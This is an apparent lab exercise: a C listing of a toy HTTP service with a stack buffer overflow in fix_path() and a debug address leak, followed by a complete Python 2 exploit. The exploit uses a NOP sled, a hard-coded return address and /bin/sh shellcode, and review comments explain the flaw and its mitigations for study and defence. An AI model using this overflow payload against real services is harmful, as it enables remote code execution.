#include "../common/common.c"
/*
 * fix_path - canonicalise `path` in place with realpath().
 *
 * Returns 1 when realpath() fails. On success the function falls off the end
 * without a return statement, so the returned value is indeterminate; the
 * only caller visible in this listing (parse_http_request) ignores it.
 *
 * NOTE(review): this is the memory-safety flaw in the listing. `resolved` is
 * 128 bytes, but realpath() called with a caller-supplied buffer may write up
 * to PATH_MAX bytes, and `path` points into a 1024-byte request buffer, so a
 * long request path overruns `resolved` on the stack. A corrected version
 * would size `resolved` to PATH_MAX (or pass NULL so realpath() allocates the
 * result) and bound the copy back into the caller's buffer.
 */
int fix_path(char *path)
{
    /* fixed 128-byte stack buffer; smaller than the input it can be handed */
    char resolved[128];
    if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
    /* unbounded copy: the resolved name may be longer than the original text,
     * and this function does not know how much room the caller's buffer has */
    strcpy(path, resolved);
}
char *parse_http_request()
{
char buffer[1024];
char *path;
char *q;
printf("[debug] buffer is at 0x%08x :-)\n", buffer);
if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host"); //if nothing
if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request"); //if not "GET "
path = &buffer[4];
q = strchr(path, ' ');
if(! q) errx(0, "No protocol version specified");
*q++ = 0;
if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");
fix_path(path);
printf("trying to access %s\n", path);
return path;
}
/*
 * main - start the service and parse one request.
 *
 * background_process(), serve_forever() and set_io(), as well as NAME, UID,
 * GID and PORT, are not defined in this listing; presumably they come from
 * ../common/common.c -- confirm there what privileges the process keeps and
 * how the accepted socket is wired to stdin/stdout.
 *
 * `p`, argc, argv and envp are unused, and the pointer returned by
 * parse_http_request() is discarded.
 */
int main(int argc, char **argv, char **envp)
{
    int fd;
    char *p;
    background_process(NAME, UID, GID);
    fd = serve_forever(PORT);
    set_io(fd);
    parse_http_request();
}
Exploit source (Python 2):
#!/usr/bin/python
# Python 2 script (print statement, byte-valued str literals) that builds one
# request for the server listing above and writes it to stdout.
#
# NOTE(review): what a defender can read from this layout --
#  - the path field is longer than the 128-byte `resolved` buffer in
#    fix_path(), which has no length check in front of it;
#  - `ret` is a hard-coded stack address, presumably taken from the server's
#    "[debug] buffer is at" line, so that disclosure is what makes the
#    address predictable;
#  - machine code is carried inside the request and expected to run from the
#    stack, which assumes no stack protector and an executable stack.
# Bounding the copy in fix_path(), removing the debug print, and building with
# stack protection, a non-executable stack and address randomisation each
# remove an assumption this script depends on.
from struct import *
# pack a value as a 4-byte little-endian unsigned integer
p = lambda x : pack("<L",x)
# opaque i386 machine-code bytes; presumably a shell-spawning payload (the
# bytes include the ASCII string "/bin/sh")
shellcode = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" +\
"\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00" +\
"\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x53\x89\xe1\xcd" +\
"\x80"
# fixed address on the target's stack; valid only for the author's run
ret = 0xbf999288
payload = ""
# method prefix that parse_http_request() compares with memcmp()
payload += "GET "
# filler in the path field (0x90 is the x86 NOP opcode); the count of 139 is
# presumably chosen to span resolved[128] plus saved frame data -- not
# verifiable from the listing
payload += "\x90"*139
payload += p(ret)
# satisfies the strncmp() prefix check; bytes after it are never validated
payload += " HTTP/1.1 "
payload += "\x90"*50
payload += shellcode
print payload
clear!